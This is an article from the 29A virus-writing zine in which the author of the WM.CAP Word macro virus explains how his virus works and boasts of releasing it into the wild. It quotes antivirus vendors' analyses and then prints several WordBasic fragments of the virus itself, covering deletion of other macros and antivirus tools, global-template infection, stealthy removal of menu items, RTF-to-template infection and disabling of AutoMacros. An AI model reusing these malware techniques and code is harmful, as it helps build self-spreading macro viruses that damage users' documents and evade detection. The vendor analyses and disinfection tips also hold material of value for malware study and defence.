Copy Link
Add to Bookmark
Report
29A Issue 02 02 04
WM.CAP virus description
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ>
Jacky Qwerty/29A
This article gives a full description of the WordMacro CAP virus. It can be
seen as a "real" example for the different techniqz described in the past
article named "Macro virus trickz".
Check out as well the virus source code, also published in this isue.
Index
ÄÄÄÄÄ
1. Introduction
1.1 Macro virus hype
2. WM.CAP: a complex word macro virus?
3. In the Newz
3.1. Dr.Solomon speaks
3.2. Sophos speaks
3.3. McAfee speaks
3.4. F-Potatoe speaks
3.5. Norton speaks
3.6. AVP speaks
3.7. Quarterdeck speaks
4. Functional Description
4.1. Removal of macroz
4.1.1. Concept vs. Wazzu
4.1.2. CAP vs. Concept
4.2. Global template infection
4.2.1. Searchin for localized macroz
4.2.2. Incremental generation count
4.2.3. Removal of menu itemz - stealth
4.3. Document, template and RTF infection
4.4. Disablin of AutoMacroz
4.5. The "SaveAs" problem solved
5. Shortcutz
6. Disclaimer
1. Introduction
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Factz prove for themselvez. Macro virii have become one of the most comon
type of computer virus. While the latter sounds like a press release, we
cant deny that unfortunately it is becomin true. "Unfortunately" becoz as u
will see later, macro virii unlike other type of computer virii, are not
really very dificult to write, in fact much of them have been coded in a
very simple way, followin a straightforward programin aproach. While there
could be some few exceptionz to the rule, macro virii in general dont prove
to deserve that kind of atention that other more interestin type of compu-
ter virii mite do, regardin other innovative infection techniqz, new wayz
of residency, improved methodz for trapin file activity and the complexity
of the virus code itself. Featurez which are very dependent to a great ex-
tent on the skillz of the VXer himself.
1.1. Macro virus hype
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
But leavin aside that atonishin publicity surroundin macro virii and now
followin a much more objetive aproach: what lies behind the creation of a
macro virus? is it really hard to write such virusez? why so much hype bout
Concept? well, not really. Much of that fuzz was nonsense, another press
release biten and exagerated by the obfuscating media. I rememeber at the
time Concept was big newz, AVerz started to say repeatedly again and again
that such macro virii were fairly easy to write and that they could be more
infectious and comon than any other virus type. Yea AVerz, strangely tho,
said the mean and lean truth. So now they come, shoot our mindz and then
wash their handz pretendin they have nothin to do with the macro virus
hype. After all, we are the "kidz" so we are the guilty onez, we are the
bad guyz and they are of course the heroez of the movie. Same old story.
2. WM.CAP: a complex macro virus?
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
CAP was a macro virus i wrote durin a bored December weekend after endin
classes for the quarter and startin my xmas vacationz. It was also my first
and last macro virus until i lost all of my interest in this stuff and fo-
cused my atention on other much more interestin virus related topicz :) It
began as a curiosity of mine when tryin to understand for myself how these
virusez worked and how much they could spread for themselvez.
The CAP virus made its way into the wild the same way most other virusez
do. It was writen in a simple 386 machine runin Windoze 3.1, it was tested
in both english and spanish versionz of Word 6, and was finaly released and
spread as with any other macro virus. Yea, it has some pretty kewl featurez
but they are far from bein extraordinary or complex as some AVerz put it,
especialy an AVer named Miko Hyppnen from Datafellowz (F-Potatoe), a very
nice dude, author of F-Potatoe buletinz, who btw behaved very kind in his
last isue when he encouraged people to send their "opinion on virus writin"
to my Hotmail mailbox. I wont forget that one, Miko, very nice from u, pal.
However it was also the first time i thanked the phuckin mother who hacked
my Hotmail acount, hrmph @&%#..
3. In the newz
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Shortly after CAP was released, there apeared a seriez of increasin reportz
posted on several newsgroupz, especially from alt.comp.virus. Userz were
suspectin about a new macro virus removin the Toolz/Macro and Toolz/Custo-
mize menu itemz from their Word enviroment. A couple of monthz later, CAP
was bein reported at diferent regionz worldwide. Was CAP just another lucky
virus or there was somethin more behind? Well, just keep readin if u want
to know the mean and lean truth. #8)
But before this lets listen to what AVerz have to say about CAP, that mite
help us understand some more about CAP's functionin, mmm.. well, just a bit
coz u know how some AVerz are, regardin their virus descriptionz. They feed
on hype describin how good their AV programz detect virusez, instead of
describin how the virusez really work and how some of them are able to de-
feat and nulify their stuff. Most of the AV programz agree they can safely
remove all (removable) virusez they detect. Factz prove this is not true.
None of the macro AV programz, except perhaps new versions of F-MacroW,
have been able to remove properly all of the CAP spontaneously generated
variantz. And as u'll see later in this article, this behavior could have
been made much more complex on purpose.
3.1. Dr.Solomon speaks
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
(*) Dr.Solomon - http://www.drsolomon.com/vircen/valerts/wmcap.html
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
WM/CAP
This macro virus appeared first in February 1997 and has quickly
become widespread. The basic virus consists of one large macro
called CAP (hence the name) which is called from the virus' other
macros - AutoExec, AutoOpen, FileSave, FileSaveAs, FileTemplates,
ToolsMacro, FileClose, FileOpen and AutoClose.
When the virus replicates, the first thing it does is to copy the basic
set of 10 macros. The virus then browses the WinWord menu items, collects
their names, (they could be different in different language versions,
or customized versions of WinWord), and intercepts up to 5 of these
additional macros - placing a pointer to the main CAP macro inside them.
If there are any system macros defined in a global template before the
infection - they are deleted. The virus also removes the menu items
Tools/Macro and Tools/Customize. The File/Templates menu item is present
after infection but it does not work.
In essence, then, the virus consists of 10 basic English macros and up
to 5 additional macros taken from the menus if they are not standard
for the English language version of WinWord.
The virus uses information from the macro description field, (at the
bottom of Tools/Macro box), for self recognition of its core macros.
These have "F%" at the beginning of a description (FileOpen has F%O,
FileClose - F%C, FileSave - F%S and FileSaveAs - F%SA).
The virus has no damaging payload except that it removes system macros
defined in the global template.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.2. Sophos speaks
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
(*) Sophos - http://www.sophos.com/virusinfo/analyses/winwordcap.html
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Virus analyses Winword/CAP
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Virus Name:Winword/CAP.
Aliases: None known.
Type: MS Word document infector.
Resident: Yes, within Word environment.
Stealth: Yes. Empty macros are used to prevent Word showing menu
items. For example, the ToolsMacro (or ExtrasMakro under
German Word) is empty, which prevents the use of the
ToolsMacro to see whether or not there are macros
present. The virus also removes the menu item itself so
that it does not even appear in the list of available
choices.
Trigger: None.
Payload: None.
Comments:
The Winword/CAP virus installs the following macros:
FileTemplates, ToolsMacro, FileSaveAs, FileClose,
AutoClose, FileSave, FileOpen, AutoOpen, AutoExec and
CAP. In addition, the virus will find the current local
language version of the macros and will install these as
well as the English ones. For example, if the virus
infects a German version of Word, it will also install
macros named DateiOffnen, DateiSpeichern,
DateiSpeichernUnter, DateiSchliebenOderAllesSchlieben.
With the exception of the CAP macro itself, all the
macros are very short stubs which either call
subroutines within CAP or do nothing at all.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.3. McAfee speaks
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
(*) McAfee - http://www.mcafee.com/support/techdocs/vinfo/vm007.asp
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
CAP.A
Virus Characteristics
This virus propagates by infecting Word Documents in Microsoft WORD
Versions 6.x / 7.x on Windows and Macintosh platforms.
The virus consists of these macros:
CAP, AUTOEXEC, AUTOOPEN, AUTOCLOSE, FILETEMPLATES, FILESAVE,
FILESAVEAS, TOOLSMACRO, FILEOPEN, FILECLOSE
in an infected document. In localized language versions of MS Word
some macros are copied to the specific SystemMacro name.
The virus becomes active by using Auto- and SystemMacros. All macros
are encrypted using the standard Word execute-only feature. Meaning
that the user is unable to edit or view the macro code.
Indications of Infection
Before infection it will delete all existing macros in NORMAL.DOT or
other templates.
On an infected system the virus hides the FILE|TEMPLATE and
TOOLS|MACRO functionality. Warning: It is important not to
use this command, as you will execute the viral code. It
may also delete these menu entries plus TOOLS|CUSTOMIZE in
the global environment. If you are affected by this virus
please read 'Add. Information'.
Virus Information
Discovery Date Mar 1997
Origin Venezuela
Length Not Applicable
Type General Macro Virus Information
Prevalence Common
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
(*) McAfee - WHATSNEW.TXT file from McAfee's SCAN v3.0.2
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
CAP.A
The Word Macro virus, CAP.A, is spreading wildly on all
corners of the globe, especially in the United States.
McAfee's AVERT Team has documented cases of CAP.A found
in: Brazil, Germany, Australia, Hong Kong, Argentina,
Columbia, England, Sweden, Mexico, Venezuela, and Russia.
CAP.A's behavior depends upon the language of Microsoft
Word being used, or if the installation of Microsoft Word
has been customized, making the cleaning of the virus
challenging for many antivirus products.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.4. F-Potatoe speaks
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
(*) F-Potatoe (DataFellows) - http://www.datafellows.fi/v-descs/cap.htm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
Computer Virus Information Pages
NAME: CAP
ALIAS: WordMacro/CAP, CUP
ORIGIN: Venezuela
For more information on macro viruses, see WordMacro/Concept.
CAP is a complex Word macro virus. It consists of several
encrypted macros: CAP, AutoExec, AutoOpen, FileSave, FileSaveAs,
FileTemplates, ToolsMacro, FileClose, FileOpen and AutoClose.
The virus contains these texts in comments:
'C.A.P: Un virus social.. y ahora digital..
'"j4cKy Qw3rTy" (jqw3rty@hotmail.com).
'Venezuela, Maracay, Dic 1996.
'P.D. Que haces gochito ? Nunca seras Simon Bolivar.. Bolsa !
When infecting Word, CAP modifies up to five already-existing
menus, redirecting them to the virus code. This creates some
problems, as the names of the modified entries are different in
different Word installations and different language versions of
Word.
When CAP infects documents, it deletes all existing macros from
them. Otherwise CAP does not do anything destructive. However,
it does remove the Tools/Macro and Tools/Customize menus and
disables File/Templates menu in order to protect itself.
WordMacro/CAP.A was reported in the wild in several countries in
1997. It's probably related to the WordMacro/Rapi virus.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.5. Norton speaks
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
(*) Norton AV - http://www.symantec.com/avcenter/data/wm.cap.a.html
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
WM.CAP.A
Aliases: WordMacro/CAP.A
Infection Length: 10 macros
Area of
Infection: Microsoft Word documents
Likelihood: Common
Region Reported: Worldwide
Characteristics: Wild, macro, Stealth
Target Platform: Macro
Trigger Date: None
Description:
WM.CAP.A is a virus that consists of 10 macros.
Macro Name Description
CAP Infection Routine
AUTOEXEC Calls the CAP macro
AUTOOPEN Calls the CAP macro
FILEOPEN Calls the CAP macro
FILESAVEAS Calls the CAP macro
AUTOCLOSE Calls the CAP macro
FILECLOSE Calls the CAP macro
FILESSAVEAS Calls the CAP macro
TOOLSMACRO Used for the Stealth Routine
FILETEMPLATES Used for the Stealth Routine
All the macros are stored in encrypted form in the infected documents.
Also WM.CAP.A has a stealth feature which hides the [macro...] menu
item from the [Tools] menu and the [Templates...] menu item from the
[File] menu when the NORMAL.DOT (Global template) file is infected.
This will prevent the user from checking the list of macros which in
contained in the document or template and hides the macros. Once the
NORMAL.DOT file is disinfected, the [macro...] menu and [Templates...]
menu item are restored.
WM.CAP.A has no intentional Trigger or Payload.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.6. AVP speaks
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
(*) AVP - http://www.avp.ch/avpve/macro/word/cap.stm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
This is an encrypted stealth macro virus. It contains ten macros:
CAP - infection routine
AutoExec - calls the infection routine
AutoOpen - - // -
FileOpen - - // -
FileSave - - // -
AutoClose - - // -
FileClose - - // -
FileSaveAs - - // -
ToolsMacro - hides all macros ("stealth" routine)
FileTemplates - - // -
The virus not only disables ToolsMacro and FileTemplates menus, but also
deletes the references to them in main menus File and Tools. The virus
also disables auto-macros. As a result it is not possible to disinfect
this virus by using Word functions - there is no possible to delete
virus macros, create new or run existing virus removing macros.
The virus emulates "FileSaveAs" while saving infected documents -
it writes an empty document to disk.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
3.7. Quarterdeck speaks
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
(*) Quarterdeck - http://www.quarterdeck.com/quarc/00011/00011128.htm
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
WM/Cap.A
Summary: WM/Cap.A infects Microsoft Word for Windows documents and
templates. It contains 10 macros: CAP, AutoExec, AutoOpen,
FileOpen, FileSave, AutoClose, FileClose, FileSaveAs,
ToolsMacro, FileTemplates -- about 214 lines and 3926
characters of macro code after analysis standardizes the
formatting within the virus.
Author: Unknown
Date of Origin: Prior to January 1996
Prevalence: Prevalent in Belgium, Canada, Czech Republic, Denmark,
Finland, Hong Kong, Luxemburg, New Zealand, Norway, Peru,
South Africa, Sweden, U.K., U.S.A. and elsewhere as of
July, 1997.
Variants: At least 18 variants as of June 30, 1997: A, B, C, D, E,
F, J, L, N, O, P, Q, R, S, T, U, V, W
Macro Functions:
CAP: This macro contains an infection routine which appears to
work in all language versions. Includes code to trap any
errors and ignore them, to help avoid detection. Modifies
user settings for saving documents. Options are set to
fast saves, allow automatic saving, save changes in global
template without asking, 10 minutes between automatic
saves. Removes menu options from Word's menus. The global
template (usually Normal.dot) will need to be deleted in
order to restore Word's normal menus. Disables AutoOpen,
AutoClose, AutoNew, and AutoExit macros, disabling many
other macro viruses, as well as any macro-based anti-virus
protection.
AutoExec: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
AutoOpen: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
FileOpen: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
FileSave: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
AutoClose: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
FileClose: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
FileSaveAs: Calls infection routine (CAP). Includes code to trap any
errors and ignore them, to help avoid detection.
ToolsMacro: Hides the [Macro...] menu option normally on the [Tools]
menu when an infected file is loaded, preventing a user
from using this menu option to see the macros of the
virus.
FileTemplates: Hides the [Templates...] menu option normally on the
[File] menu when an infected file is loaded, preventing a
user from using the [Organizer] option on this menu to see
the macros of the virus.
Stealth Hides the [Macro...] menu option normally on the [Tools]
Mechanisms: menu when an infected file is loaded, preventing a user
from using this menu option to see the macros of the
virus. Hides the [Templates...] menu option normally on
the [File] menu when an infected file is loaded,
preventing a user from using the [Organizer] option on
this menu to see the macros of the virus. High stealth.
Comments: This sample of WM/Cap.A contains the following comments:
(...)
These comments are ignored by Word when the macros in
WM/Cap.A run, and are not displayed. Comments in macro
viruses sometimes suggest date or place of origin,
authorship or purpose of the virus.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
4. Functional description
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
While the description from Dr.Soly is the most accurate from the above, it
still doesnt explain some especific detailz. Some descriptionz are, well..
full hype, some are just promotin how excelent their AV program is and some
just dunno what they say. However no matter how good or bad any description
is, they have somethin in comon: all of them invariably try to hide the
true reason why CAP has become so comon. I'll try to remedy that here by
writin my own description now.
4.1. Removal of macroz
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Whenever an infected document is opened or a clean or infected Word enviro-
ment, the virus first checks its own set of 10 basic macroz from the infec-
ted document bein opened. All CAP macroz share a common pattern ("F%") sto-
red in the macro description field. If this pattern is not found, CAP dele-
tes the macro. This process is then repeated for the global template (NOR-
MAL.DOT). This means that all of the foreign macroz stored in the infected
document and in the global template previous to infection are removed. This
includes any protection AV tool or any other macro virus.
4.1.1. Concept vs Wazzu
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This prior scenario has a strong implication regardin CAP survival. Supose
a given company is bein strongly infected by the Concept or any other macro
virus. Now supose another macro virus, say Wazzu, enters in the company
circulation. Now these two virusez will be fightin each other for survival.
There cant be two "AutoOpen" macroz for obvious reasonz as there cant be o-
ther macroz repeated twice. The final result could be a new "Concept-Wazzu"
variant consistin of snatched macroz from each virus, or simply the same
diferent two virusez collidin with each other all the time. But what if the
second virus enterin the company is the CAP virus?
4.1.2. Concept vs CAP
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Well, thingz will be a bit diferent this time. The CAP virus will spread
for itself to other documentz as with any other macro virus, but it wont
spend its time collidin with Concept, instead CAP will just remove each
instance of Concept from the infected documentz and replace it with its own
copy. If CAP keeps spreadin this way from documentz, it doesnt take much
time to figure out the final resultz. In a matter of dayz, CAP will clearly
"outnumber" Concept, until it almost disapears from the company. This means
that CAP can be considered an eficient antivirus for macro virus, coz the
macro cleanin capabilitiez travel and spread inside the virus itself. The
slogan here is: "Use CAP as your favourite AV program". At this point i can
hear Bontchy mentionin my genealogic tree from top to bottom ($@%#..) X-DD.
When CAP finishes the macro checkin, it has a count for the number of ge-
nuine CAP macroz from the global template and another same count from the
infected document. If the number of CAP macroz in the global template is
less or equal than 10 (the number of english basic macroz) then the infec-
tion (or re-infection) of the global template takes place.
4.2. Global template infection
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The infection of the Global template allows the macro virus to be loaded
resident inside the Word aplication everytime the latter starts. Before in-
fectin the Global template, CAP uses the comon trick of turnin off the Glo-
bal template prompt warnin when is about to be saved on disk. Besides this,
CAP also turns on FastSavin and AutoSavin, setin the AutoSave interval to
10 minutez. Then the copy of macroz take place. In the particular case of
CAP, the virus infects the Global template by first copyin just the basic
set of 10 english macroz from the infected document. If CAP would have co-
pied all of the macroz contained in the infected document besides the en-
glish onez, the resultz would have been a real nightmare for AV developerz.
There would have been a mix of diferent localized language macro namez in-
side CAP. The very first unedited and unreleased versionz of CAP worked
this way but i decided to strip this feature off for technical reasonz that
i will explain later.
Continuin with the above hypothetical example, supose that a document was
infected by CAP in an english version of Word. Now supose this document so-
mehow travels and infects an italian version of Word. Now the virus would
contain 15 macroz (10 english onez plus 5 italian onez). If the document
now infects a german version of Word, there would be 20 macroz (10 english
onez, 5 italian onez and 5 german onez). If the virus keeps spreadin this
way thru other diferent localized versionz of Word, the number of macroz
could easily reach 50 for a given document havin traveled all over the
world and havin infected at least more than 8 diferent localized versionz
of Word. Fortunately the only CAP version bein released doesnt work that
way. Otherwise it would have been a big kick in the AVerz's assez. #8P
4.2.1. Searchin localized macroz
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
While the latter aproach would have made sense in order to annoy AVerz,
technically it would have been useless and worthless in the particular case
of the Global template infection. Coz after the virus has copied the basic
set of 10 english macroz, the followin step is to search the menu itemz for
the current localized file related macroz and copy them to the Global tem-
plate. After this step, suport for especific localized versionz of Word has
been added without the need to copy all of the other localized macroz from
the infected document. This conjunction of stepz prove to be more efective
than the one discused in the hypothetical example described above. This way
the maximum number of macroz in any infected or Global template will never
exceed 15.
In the past article "Macro virus trickz", point 3.1. (The "MultiLanguage
suport" solution) and point 3.2 (The "MultiLanguage suport" example), the
search and copy of localized file related macroz from the menu itemz is
explained in full detail. This is the same aproach implemented in the CAP
virus as the next chunk of code shows:
A$ = MenuText$(0, 1)
For I = CountMacros(1) To 1 Step - 1
J = 0
B$ = MacroName$(I, 1)
Select Case MacroDesc$(B$)
Case S$ + "O"
J = 2
Case S$ + "C"
J = 3
Case S$ + "S"
J = 5
Case S$ + "SA"
J = 6
End Select
If J Then
C$ = MenuItemMacro$(A$, 0, J)
If Left$(UCase$(C$), Len(M$(J))) <> UCase$(M$(J)) And
Left$(C$, 1) <> "(" Then MacroCopy F$ + ":" + B$, C$, K
End If
Next
4.2.2. Incremental generation count
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
One feature that has not been mentioned before is the fact that CAP con-
tains a "generation count". This count, unlike other previous macro virusez
implementin generation countz, is stored in one of the viral macroz inside
all CAP infected documentz, especificaly in the macro description field of
the "ToolsMacro" macro. This generation count can be seen in two diferent
wayz. Usin a hex editor to dump the contentz of an infected file and lookin
for somethin like "F%n" where "n" is the generation count. Or enablin the
"Tools/Macro" menu item from the "Tools" menu. If this menu item gets the
focus, the macro description will be showed in the bottom left corner of
the aplication window, revealin somethin like "F%5" where "5" in this case,
is the generation count.
It has been said that all of the CAP macroz are encrypted usin the "Execute
Only" feature provided by Word. While this is certainly true for most of
the CAP macroz, it is not true for the "ToolsMacro" macro. In other wordz,
the "ToolsMacro" macro, which is empty, is never encrypted. U mite say this
is clumsy, but it is not. The reason for this, is becoz if any macro is en-
crypted, its macro description field cannot be modified. This wouldnt allow
us to increment the generation count stored in the "ToolsMacro" macro des-
cription field. But how do we increment this generation count? the followin
piece of code answers the question:
C$ = "F%" + LTrim$(Str$(Val(Mid$(MacroDesc$("ToolsMacro"), 3)) + 1))
ToolsMacro .Name = "ToolsMacro", .Show = 1, .Description = C$, .SetDesc
The first line simply gets the "ToolsMacro" description field usin the
"MacroDesc$" function, then discards the first two characterz ("F%") usin
the "Mid$" function, then converts the remainder string to an integer usin
the "Val" function, then increments the result by simply addin "1", then
converts it back to a string usin the "Str$" function and finally concate-
nates it with "F%" to obtain the final string containin the next incremen-
ted generation count embeded with it. The second line in the above piece of
code simply sets the new description for the "ToolsMacro" macro, containin
the new incremented generation count.
The generation count is incremented after the basic set of 10 english ma-
croz have been copied to the Global template, as a result such count is in-
cremented only once for each Word aplication infected with CAP. All newly
created documentz, saved, closed or opened, will contain the same genera-
tion count at the time the Global template was infected.
4.2.3. Removal of Tool itemz - stealth
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Perhapz one of the most known featurez of CAP is its ability to remove some
key menu itemz from the "Toolz" menu. This has been a clue for AVerz. When-
ever a Word user posted a mesage sayin his Toolz/Macro and Toolz/Customize
menu itemz disapeared, there also apeared some AVer sayin: "You have the
CAP virus". This feature has also proved to be very anoyin and frustratin
among AVerz, as it complicates to some extent the complete and correct dis-
infection of the Global "NORMAL.DOT" template, becoz userz of course, want
their menu itemz back.
In efect, some AV programz that are able to remove all of the CAP viral ma-
croz from the Global template, would find themselvez a bit frustrated at
their inability to properly fix the changez made by CAP to the Word menuz.
Its pathetic readin the comon solution provided by most of these high tech
AVerz in order to fix the problem. I still can hear them say: "Exit Word,
delete NORMAL.DOT, Start Word, now the menu itemz are back". While this
straightforward solution certainly works, it proves to be quite ineficient
and exagerated as well. C'mon the fastest and most efective solution was at
the "right click" of a mouse! Well, heh.. sometimez i think it is true some
AVerz have 4 bugz playin cardz in their brainz :) This solution even worked
on my Word 6.0 runin on Win3.1, not just Win95.
Just in case u need the solution, its very simple: Right-click over some
place at the toolbar, the Customize window box opens, select the "Menus"
tab, push the "Reset All" buton then click OK, thats all. After these stepz
the menu itemz "Toolz/Macro", "Toolz/Customize", etc, are back. However, no
matter the first or second procedure is used if the user has made menu cus-
tomizationz or added some butonz to his toolbar, they are lost after doin
any of these stepz. There exists however a third solution not mentioned be-
fore in which the user wont lose any of his customizationz except of course
his own macroz (now deleted) if they existed. It consists of addin the lost
menu itemz one by one usin the "Add" buton from inside the "Customize" win-
dow box. Good enough, now lets continue with our stuff.
The actual implementation of the macro code targeted to remove these menu
itemz is very simple, but it certainly looks somewhat complicated and messy
if u have a first look at the virus code itself:
For I = 0 To 1
If I Then J = 1 Else J = 6
A$ = MenuText$(I, J)
J = CountMenuItems(A$, I) - 1
For M = J To 1 Step - 1
If InStr(MenuItemMacro$(A$, I, M), "Macro") Then
If I Then
B$ = MenuItemMacro$(A$, I, M - 2)
If UCase$(B$) <> UCase$(M$(9)) And
Left$(B$, 1) <> "(" Then MacroCopy "ToolsMacro", B$, K
Else
M = M + 1
End If
For T = M To M - 1 Step - 1
If T > 3 Then ToolsCustomizeMenus .MenuType = I,
.Position = T,
.Name = MenuItemMacro$(A$, I, T),
.Menu = A$, .Remove, .Context = 0
Next
M = 1
T = 0
End If
Next
Next
This code starts by inspectionin each of the menu itemz from the "Toolz"
menu from top to bottom, scanin each name for the word "Macro" inside them.
If any of the menu itemz contains such word as part of its name, then CAP
asumes it has found the position for the "Toolz/Macro" menu item inside the
"Toolz" menu. If this condition is met, CAP deletes the actual menu item
(Toolz/Customize). If the virus is searchin inside the "File" menu - with
no documentz opened - (second step) and if the word "Macro" is found inside
any of the menu itemz from such "File" menu, CAP removes the actual menu
item (Toolz/Macro) and the "previous" one - not the next one - which in the
case of the "File" menu (with no documentz opened), is really a "separator"
itself startin with "(".
If u are curious enough, u'll notice somethin in the above code not mentio-
ned in the latter explanation. There is a "MacroCopy" function. This func-
tion gets control when the "Filez" menu is bein scaned and the "Toolz/Ma-
cro" item is found as well. Its sole purpose is to copy the "FileTemplatez"
macro to the current localized macro name.
If for some reason, the above stepz dont work, i.e. the "Toolz/Macro" menu
item could not be found, for example in German versionz of Word where "Ma-
cro" is spelled as "Makro", then another chunk of code is executed:
A$ = MenuText$(1, 1)
[...]
J = CountMenuItems(A$, 1) - 1
[...]
For I = 6 To J
If Left$(MenuItemMacro$(A$, 1, I), 1) = "(" And
Left$(MenuItemMacro$(A$, 1, I - 2), 1) = "(" Then
For T = 1 To 3 Step 2
B$ = MenuItemMacro$(A$, 1, I - T)
If Left$(B$, 1) <> "(" Then MacroCopy M$(T + 6), B$, K
Next
I = J
End If
Next
This code actually tries to make some guessez about where the "Toolz/Macro"
and "File/Templatez" menu itemz are located in the "File" menu (when no fi-
lez are opened). If these checkz are passed then the "ToolsMacro" and "File
Templates" macroz are copied to their respective localized macro namez. Un-
fortunately after CAP was released i realized that the condition block for
the "If" statement never met becoz of a certain detail i didnt realize.
This is the reason why in German version of Word or in general in any other
localized version where the word "macro" is not found in the menu itemz,
there won't be an equivalent localized macro for "FileTemplates" nor "Tools
Macro". Well what TF nobody's perfect! #8I.
4.3. Document, template and RTF infection
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
It has been said that CAP, as with any other macro virus, infects Word do-
cumentz and templatez. However what AVerz seem to have missed at all is the
fact that CAP also infects documentz in RTF (Rich Text Format) layout. If
AVerz argue that RTF filez cant contain macroz at all, they are certainly
right. But hey, nothin stop us from convertin the RTF file into a Word tem-
plate and then copy our macroz there! If so, the file will still have the
RTF extension but will contain a template format inside. Here's the code:
Dim D As FileSaveAs
GetCurValues D
If N < 10 And D.Format = 1 Or D.Format = 0 Or D.Format = 6 Then
D.Format = 1
For I = CountMacros(0) To 1 Step - 1
B$ = MacroName$(I, 0)
If B$ <> "ToolsMacro" Then K = - 1 Else K = 0
MacroCopy B$, F$ + ":" + B$, K
Next
FileSaveAs D
End If
The above code simply checks for 3 posible conditionz: if the file is a
clean template, if the file is a document or if it has a RTF layout. If any
of these conditionz is met, the object will become infected. The infection
consists of copyin all the CAP macroz (english macroz plus localized ones
if they exist) from inside the Global template to the object bein infected
(DOT, DOC or RTF). Note in the "For" loop that when the macro name matches
"ToolsMacro", it will be copied in unencrypted form (K=0) in order to keep
the generation count alive.
4.4. Disablin of AutoMacroz
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Probably u have heard about some macro virusez bein able to "enable" Auto-
Macroz just in case they have been turned off. A clear example is the Word-
Macro.Colors virus which enables AutoMacroz each time the "Tools/Macro" me-
nu item is activated. While this could have some benefitz, it could also
add some drawbackz and dangerous efectz to our macro virus. If AutoMacroz
are enabled, then any AutoMacro that had been turned off in any template
will be reactivated. As a result, if the global template had an "AutoOpen"
macro, it will be executed each time a new document is opened. However if
the document about to be opened contains another "AutoOpen" macro, perhaps
bein part of the same or "another" macro virus, then this latter macro will
be executed "first" than the "AutoOpen" macro from inside the global tem-
plate. This means that another "foreign" macro virus could be executed
"first" without our knowledge!
If survival is critical for our macro virus, then its quite obvios that en-
ablin AutoMacroz should be avoided if posible. If another macro virus gets
the control before ours, posibly by meanz of one of its AutoMacroz, then it
could wipe away all of our own macroz from the global template, thus des-
troyin and removin our macro virus. This is unavoidable and very likely to
hapen if AutoMacroz are enabled, so u better think about it the next time u
enable AutoMacroz.
If our macro virus consists only of one single AutoOpen macro then disablin
AutoMacroz will obviosly stop all chancez to spread our virus further, so
thats perhaps a bad idea. However if our virus contains other macroz that
could automaticaly be executed or activated by other user actionz such as
keystrokez, file menu itemz, toolbar butonz, etc, then the "disablin" of
AutoMacroz would prove to be a much more atractive and robust aproach as it
